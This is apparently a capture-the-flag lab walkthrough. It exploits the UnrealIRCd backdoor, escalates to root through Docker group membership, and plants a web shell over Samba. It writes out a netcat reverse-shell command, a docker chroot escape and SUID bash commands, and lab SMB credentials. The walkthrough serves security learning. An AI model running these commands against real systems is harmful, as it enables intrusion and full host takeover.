Introduction
In the previous part, we covered network discovery and began exploiting the FTP service and web applications running on port 80. In this part, we will continue by gaining remote code execution and exploring further vulnerabilities.
We start with Nmap scanning, and in this section, we will exploit the UnrealIRCd service and SMB.
Unreal IRC Service 6697
With the Metasploit
While searching for any public exploit Metasploit have already a module for this service and the vulnerability in UnrealIRCd service file in the mirror (Unreal3.2.8.1.tar.gz) was replaced by adding a malicious version with a backdoor allows a person to execute an ANY command with the privileges of the user running the ircd in November 2009 for more information check the following Link.
Exploitation is straightforward – by setting the RHOST, selecting a payload (cmd/unix/reverse_prel), defining the target port 6697, and setting LHOST to 10.0.2.15, we obtain a command execution shell.
Now, we have a command execution shell.
According to the exploit on the Metasploit module, the exploit was targeting to connect to the service and then using AB; which is implemented in the backdoor to redirect everything coming after it to the system and then `AB; + the payload to reverse the shell.
Let’s try it manually by running the command AB; mkdir /tmp/pwn;
As we can see, the directory has been successfully created.
For taking reverse shell, we can use the same command as AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc IP_ADDRES PORT >/tmp/f
Privilege Escalation
After the reverse shell, we now have a stable shell and boba_fett is one of the docker groups which means it has access on docker without having to be in the the sudo group.
So, running docker images to list the installed images was Ubuntu one of the installed images which make the escalation a pace of cake.
`docker run -v /:/mnt –rm -it ubuntu chroot /mnt /bin/bash` by Mounting / in the Docker container and using `chroot` to give the full root access to the host system, allowing to write on the host files.
As you see in the picture, we can see the host files mounted as the root directory of the container.
Setting /bin/bash to sets the SUID by chomd u+s /bin/bash to run it as a root.
After running it with the -p option to enable privileged mode and prevent dropping permissions, we now have the effective user ID (EUID) of root,
As shown in the image below;
Samba 445
Under the /uploads/
The Chewbacca user has access to the /var/www/html.
To get the reverse shell, we need to edit these parts the IP and port places of the webshell.
Smbclient //10.0.2.15/public -U chewbacca%rwaaaawr5 to connect the smb and then upload the
they used web shell resources
Loading the web shell using the curl command to receive the reverse shell
Then, listening on the specified port (in my case, 1234), and now we have a reverse shell
Resources:
- https://lwn.net/Articles/392201
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb
- https://www.unrealircd.org/txt/unrealsecadvisory.20100612.txt
